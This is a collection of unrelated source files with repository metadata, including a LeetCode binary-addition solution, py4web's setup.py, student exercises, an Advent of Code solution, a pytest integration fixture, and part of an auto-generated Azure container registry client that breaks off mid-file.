0fd81e0c525d6d7d7955212ffee3b926f8fce3b1 | d039da1c0b99e2642d3c354de9faa6f427141ee3 | /problems/leetcode/AddBinary.py | 808381e8e1d6c8ea369dad3c843f8d22c2e756a4 | [
"MIT"
] | permissive | qicst23/pyshua | 5a3e317823d0620d2034adfe345eddd6a722c7ff | 4ae7bb8b626f233ebc2267024ba67dcfe49051ed | refs/heads/master | 2016-09-15T20:26:16.694738 | 2013-12-15T04:50:04 | 2013-12-15T04:50:04 | 15,198,867 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,325 | py | from problems.leetcode.LeetcodeProblem import LeetcodeProblem
class AddBinary(LeetcodeProblem):
def solve(self, a, b):
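        # simulate binary addition from the least significant digit,
        # propagating the carry (plusOne) through both strings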
array = []
i = len(a) - 1
j = len(b) - 1
plusOne = 0
while i >= 0 and j >= 0:
d1 = 1 if a[i] == '1' else 0
d2 = 1 if b[j] == '1' else 0
d = d1 + d2 + plusOne
            plusOne = d // 2  # integer carry (correct in both Python 2 and 3)
d %= 2
array.append(str(d))
i -= 1
j -= 1
while i >= 0:
d1 = 1 if a[i] == '1' else 0
d = d1 + plusOne
            plusOne = d // 2
d %= 2
array.append(str(d))
i -= 1
while j >= 0:
d2 = 1 if b[j] == '1' else 0
d = d2 + plusOne
            plusOne = d // 2
d %= 2
array.append(str(d))
j -= 1
if plusOne:
array.append('1')
array.reverse()
return ''.join(array)
def verify(self, original_input, input, s1, s2):
return s1 == s2
def input(self):
from Parser import parseTwoStrings
return parseTwoStrings(open(self.inputPath))
def output(self):
from Parser import parseString
for o in parseString(open(self.outputPath)):
yield o[0]
problem = AddBinary
| [
"[email protected]"
] | |
92d380a45dfc641f0c4dd4893b526402f12b7a81 | 8e4e612bd50302fce4c9b2496bd7fa58b7151f92 | /docs/examples/metaflow/src/deploy.py | 06b83b50c0ba1757b7c065fd062ee2a633d81915 | [
"Apache-2.0"
] | permissive | yaliqin/tempo | 1b30db685adcb37d2d46c356fc3b347579654d89 | 0878ae32ed6163a1c5115f20167d991a28535364 | refs/heads/master | 2023-09-02T10:51:22.167955 | 2021-11-10T07:53:26 | 2021-11-10T07:53:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | py | import tempfile
from typing import Tuple
import numpy as np
from metaflow import FlowSpec, IncludeFile
from tempo.metaflow.utils import create_s3_folder, save_pipeline_with_conda, upload_s3_folder
from tempo.serve.model import Model
from tempo.serve.pipeline import Pipeline, PipelineModels
from tempo.serve.utils import pipeline
PipelineFolder = "classifier"
def get_tempo_artifacts(
flow_spec: FlowSpec, sklearn_model: Model, xgboost_model: Model, conda_env_path: IncludeFile
) -> Tuple[Pipeline, bool]:
classifier_local_path = tempfile.mkdtemp()
classifier_url = create_s3_folder(flow_spec, PipelineFolder)
@pipeline(
name="classifier",
uri=classifier_url,
local_folder=classifier_local_path,
models=PipelineModels(sklearn=sklearn_model, xgboost=xgboost_model),
description="A pipeline to use either an sklearn or xgboost model for Iris classification",
)
def classifier(payload: np.ndarray) -> Tuple[np.ndarray, str]:
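        # use the sklearn prediction when it is class 1; otherwise defer to xgboost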
res1 = classifier.models.sklearn(input=payload)
if res1[0] == 1:
return res1, "sklearn prediction"
else:
return classifier.models.xgboost(input=payload), "xgboost prediction"
save_pipeline_with_conda(classifier, classifier_local_path, conda_env_path)
if classifier_url:
upload_s3_folder(flow_spec, PipelineFolder, classifier_local_path)
return classifier, classifier_url != ""
| [
"[email protected]"
] | |
6e061aed0334c5aabbf9c797a0301cfaf8794128 | 0e806bd0081741b64e499cc5aa5160e3441faf05 | /setup.py | e7bd2684c8cbd49b5e06af2799c78c537af52f41 | [
"BSD-3-Clause"
] | permissive | AngeloKandah/py4web | 8e36f749707c807d462daca690d4284223688434 | 8fc8349f7f3d87dd3d98bd256980a9f83af40361 | refs/heads/master | 2023-05-28T12:35:50.647129 | 2021-06-07T23:53:18 | 2021-06-07T23:53:18 | 370,612,357 | 0 | 0 | BSD-3-Clause | 2021-05-25T08:01:09 | 2021-05-25T08:01:09 | null | UTF-8 | Python | false | false | 1,573 | py | """
The future of web2py
"""
import re
from setuptools import setup
def get_version():
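    # extract __version__ from py4web/__init__.py without importing the package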
    regex = re.compile(r"__version__\s*=\s*['\"](?P<version>.+?)['\"]")
return regex.findall(open("py4web/__init__.py").read())[0]
setup(
name="py4web",
version=get_version(),
url="https://github.com/web2py/py4web",
license="BSD",
author="Massimo Di Pierro",
author_email="[email protected]",
maintainer="Massimo Di Pierro",
maintainer_email="[email protected]",
description="Experimental py4web (a better web2py)",
packages=["py4web", "py4web.utils", "py4web.utils.auth_plugins"],
package_data={"py4web": ["assets/*"],},
install_requires=[
"bottle",
"click",
"gunicorn",
"gevent",
"threadsafevariable",
"pydal",
"pyjwt",
"yatl",
"tornado",
"pluralize",
"requests",
"watchgod",
],
entry_points={"console_scripts": ["py4web=py4web.core:cli"],},
zip_safe=False,
platforms="any",
classifiers=[
"Development Status :: 1 - Planning",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Database :: Front-Ends",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
| [
"[email protected]"
] | |
af81e0db25a608e71b0508000dc02e02530b7234 | 75db8f938e8f766ad6977b813c4170490ea570c0 | /images/img.py | 84bd12f6906bac9e98b587f98385a64d9154a869 | [] | no_license | Nzparra/Chatbot_Haana | da0df1c012a969c023e13e9a495263ca68a083ed | 7965876b68b579c0cbc248e31fe91dc35aaa0fed | refs/heads/main | 2023-04-17T11:58:44.057523 | 2021-05-05T21:38:11 | 2021-05-05T21:38:11 | 364,453,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | from tkinter import *
imagelist = {
'banner': ['banner.jpg', None],
'Haanna': ['Haana.png', None],
}
def get(name):
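    # lazily load the PhotoImage on first request and cache it for reuse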
if name in imagelist:
if imagelist[name][1] is None:
print('loading image:', name)
imagelist[name][1] = PhotoImage(file=imagelist[name][0])
return imagelist[name][1]
return None | [
"[email protected]"
] | |
cc2f34c27a84ac3c53ca9f2fdd8828c8b1ecb4ef | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/282/83193/submittedfiles/testes.py | 306b1527049883c70372090e3ca6455e127fa65f | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 98 | py | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
n = int(input('Digite um numero: '))
if n >= 0:
    pass
| [
"[email protected]"
] | |
8c4a0a056672ebe9c3ab02af2964b3c37ab112a1 | 402cb8ac32c5ca7a53f5875688d1ebba1e96474b | /set103.py | 20f04fb7293b6b0248c32679c6948d0789c03aa5 | [] | no_license | Srija-U/codekataplayer | c073a13d8621f641a8aba8f23ebee4e1b673d58f | 392f24f35f178b034cfb76d2acc31bbc4b3a5814 | refs/heads/master | 2020-05-02T10:59:45.052802 | 2019-07-22T00:27:46 | 2019-07-22T00:27:46 | 177,914,184 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | n=int(input())
t=0
if(n%2==1):
n=n-1
t=1
l=[int(i) for i in input().split()]
r=[]
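# swap each adjacent pair of elements; an odd trailing element is re-appended below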
for i in range(n):
if(i%2==0):
r.append(l[i+1])
else:
r.append(l[i-1])
if(t==1):
r.append(l[n])
print(sep=" ",*r)
| [
"[email protected]"
] | |
018cb05750fc80d8c67df193536f4cdb378257ce | 4d327de5447519d3c00e6572f74362380783006f | /source/res/scripts/client/gui/impl/windows/__init__.py | 62086e5e820d17c53b13514fc18efc2662b63020 | [] | no_license | XFreyaX/WorldOfTanks-Decompiled | 706ac55d919b766aa89f90c97a75672bf2142611 | 5025466edd0dd3e5e50a6c60feb02ae793f6adac | refs/heads/master | 2021-09-21T15:10:32.655452 | 2018-08-28T07:34:00 | 2018-08-28T07:34:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,054 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/impl/windows/__init__.py
from frameworks.wulf import WindowFlags
from gui.impl.windows.content_menu_id import ContextMenuID
from gui.impl.windows.context_menu_window import ContextMenuContent, ContextMenuWindow
from gui.impl.windows.popup_window import PopUpWindow
from gui.impl.windows.main_window import MainWindow
from gui.impl.windows.service_window import ServiceWindow
from gui.impl.windows.standard_window import StandardWindow
from gui.impl.windows.tooltip_window import SimpleToolTipWindow, ToolTipWindow
from gui.impl.windows.window_view import WindowView
class UserWindowFlags(WindowFlags):
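    # compose user window types from the base MAIN_WINDOW flag plus dedicated
    # type bits (0x10000 lobby, 0x20000 battle); 0xF0000 masks all user types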
LOBBY_MAIN_WND = WindowFlags.MAIN_WINDOW | 65536
BATTLE_MAIN_WND = WindowFlags.MAIN_WINDOW | 131072
USER_TYPES_MASK = WindowFlags.WINDOW_TYPE_MASK | 983040
__all__ = ('ContextMenuID', 'ContextMenuContent', 'ContextMenuWindow', 'MainWindow', 'ServiceWindow', 'StandardWindow', 'SimpleToolTipWindow', 'ToolTipWindow', 'PopUpWindow', 'WindowView')
| [
"[email protected]"
] | |
3cea620947c202587408de931f65151901e7d471 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/106/usersdata/191/51970/submittedfiles/questao2.py | dc6a45115c8ab2373b6df6e309d2ac7593d76b60 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py | # -*- coding: utf-8 -*-
ap1=int(input('digite o primeiro numero apostado:'))
ap2=int(input('digite o segundo numero apostado:'))
ap3=int(input('digite o terceiro numero apostado:'))
ap4=int(input('digite o quarto numero apostado:'))
ap5=int(input('digite o quinto numero apostado:'))
ap6=int(input('digite o sexto numero apostado:'))
s1=int(input('digite o primeiro numero sorteado:'))
s2=int(input('digite o segundo numero sorteado:'))
s3=int(input('digite o terceiro numero sorteado:'))
s4=int(input('digite o quarto numero sorteado:'))
s5=int(input('digite o quintonumero sorteado:'))
s6=int(input('digite o sexto numero sorteado:'))
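# 'terna': all of the first three bet numbers appear among the six drawn numbers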
if (ap1==s1 or ap1==s2 or ap1==s3 or ap1==s4 or ap1==s5 or ap1==s6) and (ap2==s1 or ap2==s2 or ap2==s3 or ap2==s4 or ap2==s5 or ap2==s6) and (ap3==s1 or ap3==s2 or ap3==s3 or ap3==s4 or ap3==s5 or ap3==s6):
    print('terna')
| [
"[email protected]"
] | |
4ccdd823740fe9f5733cbda40c7455622cb8a1b9 | 4908b1d34d69c1cb652f25049552562574e1075f | /2020/Day-21/Allergen_Assessment/solve_1.py | bc99cdd01a13e1505ee0f04c259e5b8bf69fda85 | [
"MIT"
] | permissive | sreekesari-vangeepuram/adventofcode | 3d4ad98a25a30640182d928538b421e00ad8259d | 645531be0208affe042ac0328105b9ef3cfc9dbf | refs/heads/main | 2023-07-26T13:36:03.036721 | 2021-08-11T08:27:25 | 2021-08-11T08:27:25 | 317,850,039 | 1 | 0 | MIT | 2021-08-11T08:27:26 | 2020-12-02T12:08:13 | Go | UTF-8 | Python | false | false | 1,369 | py | #!/usr/bin/env python
def pair_up(ingredients_list):
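    # map each allergen to the intersection of the ingredient sets from every
    # line that lists it; only those ingredients can possibly contain it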
buff_dict = dict()
all_ingredients = list()
for row in ingredients_list:
ingredients, allergens = row.replace(")", "").split(" (contains ")
ingredients, allergens = set(ingredients.split()), set(allergen.strip() for allergen in allergens.split(","))
all_ingredients += list(ingredients)
for allergen in set(allergens):
buff_dict[allergen] = buff_dict.get(allergen, ingredients).intersection(ingredients)
return buff_dict, all_ingredients
ingredients_list = open("input.txt").read().strip().split("\n")
pairs, all_ingredients = pair_up(ingredients_list)
verified_allergens, verified_ingredients = set(), set()
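# constraint propagation: repeatedly pin allergens whose candidate set has
# shrunk to a single ingredient, then drop that ingredient from the other sets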
while len(pairs.keys()) != 0:
for allergen, ingredients in pairs.items():
if len(ingredients) == 1:
verified_allergens.add(allergen)
verified_ingredients.add(ingredients.pop())
else:
pairs[allergen] = ingredients - verified_ingredients
for allergen in verified_allergens:
if allergen in pairs.keys():
_ = pairs.pop(allergen)
unmatched_ingredients = set(all_ingredients) - verified_ingredients
appearances = sum(all_ingredients.count(ingredient) for ingredient in unmatched_ingredients)
print(f"Count of the [duplicate] unmatched ingredinets: {appearances}")
| [
"[email protected]"
] | |
d0f36bff5a8e9441f03620fa0d8be3b18a40d2c2 | 79f42fd0de70f0fea931af610faeca3205fd54d4 | /base_lib/ChartDirector/pythondemo/shadowpie.py | c14b2d3667d78add97f394492cf2a5f7860ad9dc | [
"IJG"
] | permissive | fanwen390922198/ceph_pressure_test | a900a6dc20473ae3ff1241188ed012d22de2eace | b6a5b6d324e935915090e791d9722d921f659b26 | refs/heads/main | 2021-08-27T16:26:57.500359 | 2021-06-02T05:18:39 | 2021-06-02T05:18:39 | 115,672,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | #!/usr/bin/python
from pychartdir import *
def createChart(chartIndex) :
# the tilt angle of the pie
angle = chartIndex * 90 + 45
# The data for the pie chart
data = [25, 18, 15, 12, 8, 30, 35]
# Create a PieChart object of size 110 x 110 pixels
c = PieChart(110, 110)
    # Set the center of the pie at (55, 55) and the radius to 36 pixels
c.setPieSize(55, 55, 36)
# Set the depth, tilt angle and 3D mode of the 3D pie (-1 means auto depth, "true" means the 3D
# effect is in shadow mode)
c.set3D(-1, angle, 1)
# Add a title showing the shadow angle
c.addTitle("Shadow @ %s deg" % (angle), "arial.ttf", 8)
# Set the pie data
c.setData(data)
# Disable the sector labels by setting the color to Transparent
c.setLabelStyle("", 8, Transparent)
# Output the chart
c.makeChart("shadowpie%s.png" % chartIndex)
createChart(0)
createChart(1)
createChart(2)
createChart(3)
| [
"[email protected]"
] | |
0b581dfd0400c5c54324568a3983a2c3fb21fe1e | 6d8d05e6fce7ff4a6b58c4ab021ea605e8d00878 | /PDF/urls.py | 2a48ebda94a510517922c077bbd612edf326d994 | [] | no_license | joy1954islam/How-to-create-PDF-files-in-a-Django-project | 727cfd758123392b37d4f7e625c58901d0b7ef9b | 442a438536ce290009d3bf2559c7bcdfef4cefbf | refs/heads/main | 2022-12-29T17:18:52.812433 | 2020-10-14T18:07:59 | 2020-10-14T18:07:59 | 304,097,011 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | """PDF URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from PDFApps import views
urlpatterns = [
path('admin/', admin.site.urls),
path('',views.PDFLISTVIEW.as_view(),name='pdf_list_view'),
path('view/<int:pk>/',views.render_pdf_view,name='pdf_view'),
path('create/',views.PDFCreate.as_view(),name='create'),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) | [
"[email protected]"
] | |
3969ff07af1dcbc0f0f9d92c21c339379ec8c241 | fbb141c9b99c4c08ce2c0acfe13630d694d98744 | /Week_02-Hash&stack&queue/08_nTreeLevelorder.py | 885576cab7b3f2b497b3db36a89c5a61006c158a | [] | no_license | huixian3/algorithm017 | 1534bc8a0364595b056e0f346cfe9fa8b8fee3bd | f43c99dc7810de863f8cd79115e272ac65ce9257 | refs/heads/master | 2023-04-02T07:10:03.670003 | 2021-04-13T14:38:36 | 2021-04-13T14:38:36 | 297,989,771 | 0 | 0 | null | 2020-09-23T14:05:41 | 2020-09-23T14:05:40 | null | UTF-8 | Python | false | false | 1,504 | py | #!/usr/bin/python3
# coding=utf-8
# TODO
# BFS ไฝฟ็จ้ๅๅฎ็ฐ queue deque
# ๆ ็จไบๆทฑๅบฆไผๅ
ๆ็ดข
import collections
class Node(object):
def __init__(self, val=None, children=None):
self.val = val
self.children = children
class Solution(object):
def levelOrder(self, root):
"""
:type root: Node
:rtype: List[List[int]]
"""
        # 77.9%: recursion, saving each node's level; order within a level is preserved
def levelSave(node, level):
if len(result) == level:
result.append([])
result[level].append(node.val)
for child in node.children:
levelSave(child, level+1)
if not root:
return list()
result = []
levelSave(root, 0)
return result
        # 77.9%: BFS, level-by-level traversal
# if not root:
# return list()
# d = collections.deque()
# res = []
# d.append(root)
# while d:
# r = []
# for i in range(len(d)):
# node = d.popleft()
# r.append(node.val)
# for child in node.children:
# d.append(child)
# res.append(r)
# return res
        # BFS, simplified Python version
        # d, res = [root] if root else [], []
        # while d:
        #     res.append([node.val for node in d])
        #     d = [child for node in d for child in node.children]
        # return res
| [
"[email protected]"
] | |
352d33ea6c330f082f7b8af1d5d5a548eca76fd4 | 9b2bb0c822a2d637354c92eea8dddbdbbfea89d2 | /Generic/common/registration/api/signup_completion/apidocumentation_signup_completion.py | c16f8bf0315cf8af42f9934bb40848107e28edbb | [] | no_license | archiemb303/common_backend_django | 69d299c9bc564ef520b9c9130e7f5abd7ff68306 | 36eb9931f330e64902354c6fc471be2adf4b7049 | refs/heads/master | 2023-06-26T19:25:27.355021 | 2021-07-24T06:23:49 | 2021-07-24T06:23:49 | 389,017,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,123 | py | # Sample Input:
# {
# "APIDetails":{
# "token_type":1,
# "token_vendor_id":1,
# "token_string":"sdxfcgvbhjnmklasdfghjk",
# "dev_key":"sjdkljagagerukjdgjncjdsnjkfhkjasdghreuiuie@#$%$dgd#$@d234"
# },
# "APIParams": {
# "first_name":"raj",
# "last_name":"raj",
# "email_id":"[email protected]",
# "activation_key": "d36Ej82HhRWjqIUi9baKOm4MA3gy0KLb",
# "password": "Sac$2045",
# "sex": "male",
# "date_of_birth": "1985-07-04",
# "orientation": "straight",
# "city_id":1
#
#
# }
# }
# Sample Output:
# {
# "AuthenticationDetails": {
# "Status": "Success",
# "Message": "ApiDetails fine to process"
# },
# "Payload": {
# "Status": "Success",
# "Message": "Congratulations, you areregistered successfully with genericbackend",
# "Payload": {
# "profile_id": 145,
# "first_name": "raj",
# "last_name": "raj",
# "sex": "male",
# "date_of_birth": "1985-07-04",
# "orientation": "straight",
# "web_profile_key": "6DX5SFX9mFpkRBpkSBAPPux3C4UmF2rp",
# "android_app_profile_key": "6DX5SFX9mFpkRBpkSBAPPux3C4UmF2rp",
# "ios_app_profile_key": "6DX5SFX9mFpkRBpkSBAPPux3C4UmF2rp",
# "global_profile_key": "6DX5SFX9mFpkRBpkSBAPPux3C4UmF2rp",
# "added_date": "2020-05-30T19:09:42.607003Z",
# "added_by": "[email protected]",
# "last_modified_date": "2020-05-30T19:09:42.607003Z",
# "last_modified_by": "[email protected]",
# "city_id_id": 1,
# "dp_flag_id": 1,
# "profile_status_id": 1,
# "profile_completion_status_id": 1
# }
# }
# }
# Sample Failed Output:
# {
# "AuthenticationDetails": {
# "Status": "Success",
# "Message": "ApiDetails fine to process"
# },
# "Payload": {
# "Status": "Failure",
# "Message": "invalid activation key",
# "Payload": null
# }
# }
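# Client sketch (illustrative only): one way such a payload might be POSTed.
# The endpoint path below is a hypothetical placeholder, not taken from this
# documentation; only the JSON shapes come from the samples above.
#
# import requests
#
# def complete_signup(base_url, payload):
#     # payload: the "Sample Input" dict documented above
#     response = requests.post(base_url + '/api/signup_completion/', json=payload)
#     response.raise_for_status()
#     return response.json()  # shaped like the sample outputs above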
| [
"[email protected]"
] | |
8078afef56368c393a9ce27d6c53b841545144d9 | cad9c13ad5864317d7687b44f39db42a402f36f0 | /lec05_module/module04.py | 96b6933788465ef6d16690f7b9e549ba9a7b5e99 | [] | no_license | handaeho/lab_python | 12b686eb0d57358509f2d0cd607064deced5b25d | da068ea62682ffa70c7d23dde4ef132c49a81364 | refs/heads/master | 2020-11-26T08:22:27.656109 | 2020-04-13T02:28:47 | 2020-04-13T02:28:47 | 229,013,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | """
module04.py
We want to use the mymath01 and mymath02 modules inside the utils package.
"""
# from package import module
from utils import mymath01
from utils import mymath02
print(mymath01.pi)
print(mymath02.div(10, 20))
| [
"[email protected]"
] | |
0370295f0a04bef959d0c9e07c0a941f55f712d2 | 0c6dd99ecc2c3228ed9d47f30b26b4ef6b207b67 | /integration_tests/conftest.py | 01fbb282c4bb6499015e574d83d96c6d67f630bf | [
"BSD-3-Clause"
] | permissive | yaelmi3/backslash | 68d14bbca63d2fe7c160418768d5573f92dcdfb5 | 3d3a10c07a01a8a3a1214a85ace70566b10697a2 | refs/heads/master | 2020-12-28T22:47:13.782026 | 2019-08-06T10:35:37 | 2019-08-06T10:35:37 | 245,207,397 | 0 | 0 | NOASSERTION | 2020-03-05T16:02:12 | 2020-03-05T16:02:11 | null | UTF-8 | Python | false | false | 2,482 | py | import json
import time
import subprocess
import requests
import pytest
from urlobject import URLObject
_docker_running = False
def pytest_addoption(parser):
parser.addoption(
"--app-url", action="store", default=None, help="Integration App URL"
)
parser.addoption("--admin-username", action="store", default="admin@localhost")
parser.addoption("--admin-password", action="store", default="12345678")
@pytest.fixture(autouse=True, scope="session")
def cleanup_docker(request):
@request.addfinalizer
def cleanup():
if _docker_running:
_stop_docker()
@pytest.fixture(scope="session")
def integration_url(request, timeout=30):
url = request.config.getoption("--app-url")
if url is None:
raise RuntimeError("No integration URL provided")
end_time = time.time() + timeout
retry = 0
while time.time() < end_time:
retry += 1
if retry > 0:
time.sleep(3)
try:
resp = requests.get(url)
except requests.RequestException:
continue
if resp.ok:
returned = URLObject(url)
_do_setup_if_needed(returned)
return returned
raise RuntimeError(f"URl {url} did not become available in time")
def _do_setup_if_needed(url):
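    # first-time setup: if the backend reports setup_needed, create the
    # default admin account so the integration tests can log in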
with requests.Session() as s:
s.headers.update({"Content-type": "application/json"})
if s.post(url.add_path("api/get_app_config"), data="{}").json()["result"][
"setup_needed"
]:
resp = s.post(
url.add_path("api/setup"),
data=json.dumps(
{
"config": {
"admin_user_email": "admin@localhost",
"admin_user_password": "12345678",
}
}
),
)
resp.raise_for_status()
def _start_docker():
global _docker_running
if _docker_running:
return
_docker_running = True
_run_docker_compose("build")
_run_docker_compose("up -d")
_docker_running = True
def _stop_docker():
global _docker_running
_run_docker_compose("down")
_docker_running = False
def _run_docker_compose(cmd):
subprocess.run(
f"docker-compose -f docker/docker-compose.yml -f docker/docker-compose-testing-override.yml -p backslash-testing {cmd}",
shell=True,
check=True,
)
| [
"[email protected]"
] | |
61e246152188598c94c222cacb195f78cdb2a0e1 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2019_05_01/aio/operations/_registries_operations.py | eb191cf74fde208bb18c065d79b2c7958a03c0fe | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 68,934 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._registries_operations import (
build_check_name_availability_request,
build_create_request,
build_delete_request,
build_get_request,
build_import_image_request,
build_list_by_resource_group_request,
build_list_credentials_request,
build_list_request,
build_list_usages_request,
build_regenerate_credential_request,
build_update_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RegistriesOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.containerregistry.v2019_05_01.aio.ContainerRegistryManagementClient`'s
:attr:`registries` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
async def _import_image_initial( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
registry_name: str,
parameters: Union[_models.ImportImageParameters, IO],
**kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[None] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "ImportImageParameters")
request = build_import_image_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._import_image_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_import_image_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/importImage"
}
@overload
async def begin_import_image(
self,
resource_group_name: str,
registry_name: str,
parameters: _models.ImportImageParameters,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Copies an image to this container registry from the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param parameters: The parameters specifying the image to copy and the source container
registry. Required.
:type parameters: ~azure.mgmt.containerregistry.v2019_05_01.models.ImportImageParameters
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_import_image(
self,
resource_group_name: str,
registry_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Copies an image to this container registry from the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param parameters: The parameters specifying the image to copy and the source container
registry. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
